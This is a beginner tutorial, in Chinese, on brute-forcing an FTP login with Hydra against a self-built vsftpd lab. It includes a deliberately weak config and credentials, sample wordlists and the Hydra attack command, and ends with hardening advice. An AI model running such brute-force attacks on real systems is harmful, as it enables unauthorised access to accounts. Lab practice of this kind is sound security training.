「0基础」Hydra九头蛇小白实战训练

一、创建靶场

前言：https://bbs.x10001.com/11546.html

这里我就拿简单的FTP协议来测试，我这里安装了vsptfd作为靶场

# 更新系统软件包
sudo apt update && sudo apt upgrade -y

# 安装 vsftpd
sudo apt install vsftpd -y

# 启动并启用服务开机自启
sudo systemctl start vsftpd
sudo systemctl enable vsftpd

# 配置防火墙放行FTP端口
sudo ufw allow 21/tcp

编辑 /etc/vsftpd.conf 文件以允许匿名访问或特定账户登录：

listen=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
xferlog_file=/var/log/vsftpd.log

创建一个用于测试的普通用户账号：

sudo adduser #帐户名称#

我的测试帐号如图：admin123

密码默认不可见，设置的是：123456

剩下的详细信息我们可以略过，主要测试的是用户名密码爆破，无关紧要全部回车默认值就好

二、创建字典

我这里手写了一个字典，简单测试讲解原理

字典就是一串钥匙，不断的尝试每一把钥匙🔑，试出有一把能开的钥匙，以下假设字典里刚好有这把钥匙的情况

User用户名字典

admin123 #这个是我当前的用户名
admin
testuser
anonymous
ftp
root

Passwd密码字典

admin
password
admin@123
test123
password123
ftpuser
123456 #这是我当前密码

第三步：执行 Hydra 进行 FTP 登录爆破攻击‌

先把我们的字典的目录路径，放在终端里面

假设我们扫描到目标IP地址为 127.0.0.1 

如何扫描到ftp的IP地址呢，这就要用到扫描工具了，这章不详细介绍

hydra -L users.txt -P pass.txt ftp://[TARGET_IP]

l:1/p:7

l：1代表在用户名字典的第一行

p：7代表在密码字典的第七行

这表明我们已经获取到了有效的FTP登录凭证！

‌注意事项与安全建议‌

• 此实验应在隔离环境中进行，切勿对外公开暴露FTP服务。
• 使用强密码策略防止被轻易猜解。
• 生产环境推荐禁用不必要的匿名上传权限。
• 可结合 fail2ban 工具限制失败连接次数来增强安全性防护能力。